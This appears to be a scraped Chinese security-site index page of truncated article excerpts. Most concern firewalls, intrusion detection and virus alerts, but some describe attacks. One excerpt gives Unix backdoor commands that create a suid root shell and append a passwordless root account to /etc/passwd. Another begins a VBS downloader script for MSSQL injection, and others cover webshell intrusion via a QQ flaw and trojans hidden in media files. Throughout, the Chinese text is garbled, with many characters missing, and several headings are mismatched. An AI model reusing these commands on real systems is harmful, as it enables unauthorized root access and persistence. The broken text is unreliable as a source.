windows7系统配置:如何快速解决Windows系统防火墙配置问题
防火墙有助于提高计算机安全性Windows 防火墙能够限制从其他计算机发送到用户计算机上信息这使得用户可以更好地控制其计算机上数据并针对那些未经邀请而尝试连接到其计算机用户或(包括病毒和蠕虫)提供了条防御阵线 如果您苦于在由于启用防火而增强安全性和维持系统效率的间谋求个平衡点,那么笔者推荐您读下大师Michael Howard先生篇文章来了解些具体细节信息Micha... [阅读全文]
windowsvista使用:使用Windows Vista中自带的防火墙
网络安全已经被越来越多人重视起来而在保证自己计算机安全方面最主要个手段就是安装杀毒软件Software、网络防火墙以及反间谍软件Software等各种 早在Windows XP时代微软就在系统中加入了内置防火墙这就是我们最初见到Internet Connection Firewall (ICF)它可以提供基本 包过滤功能到了XP SP2时这个内置防火墙被正式更名为Win... [阅读全文]
内网arp攻击:内网ARP攻击的一种查找思路方法
工作中碰到过几次内网ARP现就其中查找思路方法作如下分析: 当个网段有好几台服务器无法上网报障时有可能是内网ARP马上telnet 到 3层交换机上( 2层不行)用show arp(华为设备用dis arp)可以查看到有几个IP地址MAC地址相同;记下这几个IP后马上用show logging 命令(华为设备用dis logbuffer)查看日志你会发现其中有个IP没有日志报错;这个IP就是内网... [阅读全文]
状态检测:防火墙状态检测
、状态监测应该如何工作 无论何时个防火墙接收到个化TCP连接SYN包这个带有SYN数据包被防火墙规则库检查该包在规则库里依次序比较如果在检查了所有规则后该包都没有被接受那么拒绝该次连接个RST数据包发送到远端机器如果该包被接受那么本次会话被记录到状态监测表里该表是位于内核模式中随后数据包(没有带有个SYN标志)就和该状态监测表内容进行比较如果会话是在状态表内而且该数据包是会话部分该数据... [阅读全文]
防火墙是有效的隔离手段吗?
当人们谈论有关计算机安全问题时人们总要讨论隔离台计算机问题为了保证安全包含敏感数据计算机或者只允许某些人访问计算机也许是在关闭大门后面和没有网络接入正如某人曾经说过那样真正安全计算机是在上了锁房间里并且没有互联网连接计算机(可能没有插入或者打开) 然而隔离台服务器并不是个绝对条件对个系统可以实施许多程度隔离例如从安装个简单防火墙到完全物理隔离等多种程度如果你担心系统暴露给外界可能产生严重后果(甚... [阅读全文]
电脑故障排除:排除代理防火墙连接故障的窍门技巧
随着客户机和服务器的间安装更多代理防火墙排除连接故障比以前更复杂了然而稍微了解些传输控制协议(TCP)握手过程有助于诊断包括代理防火墙在内连接问题 首先对于自从我们最后次推出网络课程的后长出白发我们当中些人来说让我们复习下TCP握手是如何工作TCP是个面向连接协议在对设备的间发生任何通讯的前这些设备的间双向通道必须要打开这是通过使用包含标记特殊数据包实现个这种标记是SYN(同步)标记用来指示个连... [阅读全文]
开源邮件系统:打造开源邮件安全网关
在美国开源技术已经渗入到很多企业的中对IT人员来说开源影响力不断扩大但在中国企业用户对开源认识还大多停留在Linux开源邮件安全网关、开源入侵检测、开源漏洞分析、开源VPN这些新兴技术极大地刺激着IT人员神经有理由相信在不久将来开源安全技术将会为更多中国企业服务 根据近期美国Network World调查超过70%美国企业认可开源工具作用其中 3分的IT经理打算在年内部署开源工具要知道这个数字意... [阅读全文]
windowsxpsp2:入门IDS构建过程详述Windows 2003 SP2
从现实来看市场上所大行其道ids产品价格从数十万到数百万不等这种相对昂贵奶酪被广为诟病所导致结果就是:般中小企业并不具备实施ids产品能力它们精力会放在路由器、防火墙以及3层以上交换机加固上;大中型企业虽然很多已经上了ids产品但ids天然缺陷导致其似乎无所作为但我们还不能就此喜新厌旧ids是必需个过程具有ids功能ips很可能在几年后彻底取代单性ids市场主导地位从被动应战到主动防御是大势所趋其... [阅读全文]
七分与三分: 3分技术加上 7分管理
企业该如何在有限资金条件下达到投入和安全平衡?目前很多网络安全技术还处于探索阶段如果人云亦云地简单购买安全产品那么这个所谓it黑洞永远无法填满安全管理是填补it黑洞最经济有效方式防病毒:要求病毒代码每周至少升级2~3次;漏洞扫描:要求定期对网络扫描发现系统漏洞指导打补丁;网络入侵检测系统:随着网络结构和应用变化调整重点预警区不但要求网管员了解预警产品功能及响应还必须正确配置交换机监听端口、领导高度... [阅读全文]
使用路由器仍然还需要防 病毒 措施
如果通过路由器接入互联网不安装防病毒软件Software是否安全?是不是应该安装杀毒软件Software?即便使用路由器接入互联网也定要安装防病毒软件Software路由器具有地址转换及开闭tcp/ip通信端口功能这些功能虽然可防止病毒传播等些来自互联网攻击但其中仍有无法阻止攻击路由器无法完全防止攻击比如路由器无法防御邮件附件中病毒病毒已作为邮件部分存入个人电脑另外无法检测出从网上下载软件Soft... [阅读全文]
黑客入侵:ASP网站WebSite漏洞解析及黑客入侵防范
如何更好达到防范黑客攻击本人提下个人意见!第免费不要真就免费用既然你可以共享原码那么攻击者样可以分析代码如果在细节上注意防范那样你站点安全性就大大提高了即使出现了sql injection这样漏洞攻击者也不可能马上拿下你站点由于asp方便易用越来越多网站WebSite后台都使用asp脚本语言但是由于asp本身存在些安全漏洞稍不小心就会给黑客提供可乘的机事实上安全不仅是网管事编程人员也必须在某些安全... [阅读全文]
入侵检测系统:分析网络入侵检测系统的安全
本文针对入侵检测系统漏洞来了解下黑客入侵手法旦安装了网络入侵检测系统网络入侵检测系统就会为你分析出网上出现黑客攻击事件而且你能用此入侵检测系统反击功能即时将这种联机猎杀或阻断你也可以配合防火墙设置由入侵检测系统自动为你动态修改防火墙存取规则拒绝来自这个ip 后续联机动作!这种美好前景可能是许多入侵检测系统提供商惯用销售手法般企业或组织在建立自己入侵检测系统时也会有这种预期目诚然入侵检测系统可以具有... [阅读全文]
七层协议:网络防火墙功夫深入到第 7层
应用层攻击挑战传统防火墙 最近两年来攻击者兴趣明显从端口扫描和制造拒绝服务攻击(dos attack)转向了针对web、e-mail甚至数据库等主流应用攻击传统防火墙仅仅检查ip数据包包头而忽略了内容——如果用信件来做比喻也就是只检查了信封而没有检查信纸因此对这类应用层攻击无能为力可以说仅仅靠第 3层和第 4层ip地址和协议端口过滤防火墙产品早已走到了尽头 战火烧向 7层 为了对抗应用... [阅读全文]
windows漏洞:利用QQ文件共享漏洞入侵 Windows2003
服务器上运行第 3方软件Software历来就被攻击者们看作是入侵目标系统捷径现在著名腾讯qq又被列入了这些捷径名单好在qq并不是服务器必备软件Software的所以相信不会造成大范围危机文中遇到特殊情况虽然不多但大家还是应该遵照可能就应该防范原则做出相应防御、在windows2003中得到webshell此次渗透目标是台oa办公系统服务器其操作系统新近升级到了windows2003但oa仍存在a... [阅读全文]
家庭用户如何使用防火墙软件Software
由于黑客泛滥所以为了防止恶意攻击防火墙软件Software应运而生但是我们应该能够正确使用防火墙软件Software让它真正为我们服务防火墙都定义了安全级别为了给区别需要用户区别安全控制但是很多用户并不是特别懂这些为了安全就盲目把安全级别调整到高安全级认为安全级别越高越好其实不是这样如果你电脑太安全了你会发现网络游戏就无法启动了而且视频也就无法访问到网上视频文件了(这对于adsl用户是个极大损失)... [阅读全文]
多次注射:mssql注射时不可以多次echo的解决办法
文/superhei http://www.4ngel.net/解决办法: 1.iget.vbs次写入 在vbs语句接触是符号是: 所以我们iget.vbs可以这样写 Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send:Set s = CreateObject("... [阅读全文]
媒体文件木马攻防实战
如今网络上流传最为广泛媒体文件有两类类是RM、RMVB文件另类是WMV、WMA文件由于它们对流媒体良好支持使网络上电影、音乐等媒体文件几乎都采用了这两种媒体文件格式因此如果在媒体文件中植入木马那么媒体文件中木马独有隐蔽性将会使受害者在不知不觉中被网页木马侵害危害性可见斑 RM、RMVB中加入木马 Helix Producer Plus是款图形化专业流媒体文件制作工具我们可以利用Helix P... [阅读全文]
今日病毒预警:方式传播多样的木马
今日提醒用户特别注意以下病毒:“Agent变种jy”(Troj.Agent.jy)和“后门”(Hack.Haxdoor.fr) “Agent变种jy”(Troj.Agent.jy)木马病毒建立Kazaa共享网络文件夹连接IRC服务器进行系列破坏性操作 “后门”(Hack.Haxdoor.fr)后门病毒病毒开启系统端口给黑客以入侵机会直接降低系统安全性能 、“Agent变种jy”... [阅读全文]
信息化六大趋势:网络攻击的 6大趋势
在最近几年里网络攻击技术和攻击工具有了新发展趋势使借助Internet运行业务机构面临着前所未有风险本文将对网络攻击新动向进行分析使读者能够认识、评估并减小这些风险 趋势:自动化程度和攻击速度提高 攻击工具自动化水平不断提高自动攻击般涉及 4个阶段在每个阶段都出现了新变化 扫描可能受害者自1997年起广泛扫描变得司空见惯目前扫描工具利用更先进扫描模式来改善扫描效果和提高扫描速度 损害脆弱系统以前安... [阅读全文]
漏洞攻击:如何对PHP程序中的常见漏洞进行攻击
原著:Shaun Clowes "http://www.securereality.com.au/;; 翻译:analysist "http://www.nsfocus.com/;; 的所以翻译这篇文章是目前有关CGI安全性文章都是拿Perl作为例子而专门介绍ASPPHP或者JSP安全性文章则很少Shaun Clowes这篇文章比较全面地介绍了PHP安全问题原文可"http://www.secur... [阅读全文]
入侵技术:入侵卫星的一些技术资料
1.VAX: VAX全称是Virtual Address ExtensionVAX计算机是由于硬件条件限制被设计来储存地址使它能够很简便操作些很大适合于储存 VAX计算机系统是DES(Digital Equipment Corporation)公司设计普遍VAX系列包括些桌上型VAX系统使用是大型机上处理器这些系列计算机变得越来越小如MicroVAX计算机逐渐升级像些中等大小11/7XX系列到最新... [阅读全文]
winnt:空连接得到一些什么有用的信息(win NT系列)
下面是对个没禁止空连接系统信息分析 D:\info 211.104.116.186 Remote Info Retriever By Meteor(Slackbot) Pinging 211.104.116.186 [211.104.116.186] with 32 s of data: Reply from: 211.104.116.186: s=32 time=721ms TTL=109 R... [阅读全文]
cisco路由器:Cisco路由技术基础知识详解
路由器 最简单网络可以想象成单线总线各个计算机可以通过向总线发送分组以互相通信但随着网络中计算机数目增长这就很不可行了会产 生许多问题: 1、带宽资源耗尽 2、每台计算机都浪费许多时间处理无关广播数据 3、网络变得无法管理任何都可能导致整个网络瘫痪 4、每台计算机都可以监听到其他计算机通信 把网络分段可以解决这些问题但同时你必须提供种机制使区别网段计算机... [阅读全文]
开后门:常见开后门手法
F-king 对于我们这样菜手好不容易搞了太服务器很不容易如果被发现了就k了呵呵 其实开后门思路方法有很多种下面我来说说我以前学习过几种思路方法 1. uid #cp /bin/sh /tmp/.root #chmod u+s /tmp/.root 加上 suid 位到shell 上虽然很简单但容易被发现 2. echo "hack::0:0::/:/bin/csh" /etc/passwd 即... [阅读全文]
黑客送qq:QQ黑客
谨以此文献给oicq网友们!(oicq是什么东东?不知道?!你骗我你定是在骗我……)当看到这个题目时候我想必定能引起众多网友们注意是啊在当今这个网络流行时代伊妹儿早已成为名片中个不可缺少内容而oicq号码也正以犹如长江的水连绵不绝态势扑面而来它以其中文界面功能齐全简单易用特点深得网友们喜爱成为计算机里除windows操作系统外必不可少(夸张点了呦)我曾经在个官方网站WebSite上看到联系地址除了... [阅读全文]
黑客攻击:黑客攻击的目的
、进程执行 或许攻击者在登上了目标主机后只是运行了些简单也可能这些是无伤大雅仅仅只是消耗了些系统CPU时间但是事情并不如此简单我们都知道有些只能在种系统中运行到了另个系统将无法运行个特殊例子就是些扫描只能在UNIX系统中运行在这种情况下攻击者为了攻击需要往往就会找个中间站点来运行所需要并且这样也可以避免暴露自己真实目所在即使被发现了也只能找到中间站点地址在另外些情况下假使有个站点能够访问另个严格受... [阅读全文]
汉语口语速成入门篇:脱壳的入门篇
前 言细细回忆,学习Crack技术已经快2个月了,期间我学会东西远比我以前任何年内学东西都多(专指计算机及系统了解情况)说到学脱壳也是最近个月时间,开始总是到处询问学习脱壳思路方法,大多答案就是看雪老大书,谁也没有正面回答过.于是就自己摸索,略有点思路,老大们估计是认为理所当然,对于我们小菜来说还是说白了比较合适.在这里我就班门弄斧回,其实主要也是帮助些朋友能更快摸到门,不至于对只会照猫画虎,这... [阅读全文]
系统进程:如何杀掉本地和远程NT系统进程
杀掉本地进程其实很简单取得进程ID后OpenProcess打开进程句柄然后TerminateProcess就可以杀掉进程了有些情况下并不能直接打开进程句柄例如WINLOGON等系统进程权限不够这个时候我们就得先提升自己进程权限了提升权限过程也不复杂先GetCurrentProcess取得当前进程句柄然后OpenProcessToken打开当前进程访问令牌接着LookupPrivilegeV... [阅读全文]
开机启动:开机启动防木马大行动
以下内容可以在http://wuming.hackbase.com上面找到彩色文章!----------------------------------------------------------------------------------------------对于大部分朋友来说上网遇见最麻烦事情莫过于和上流氓软件Software不知不觉就中上了想删也删不掉尽管现在有很多专门删除这些流氓... [阅读全文]
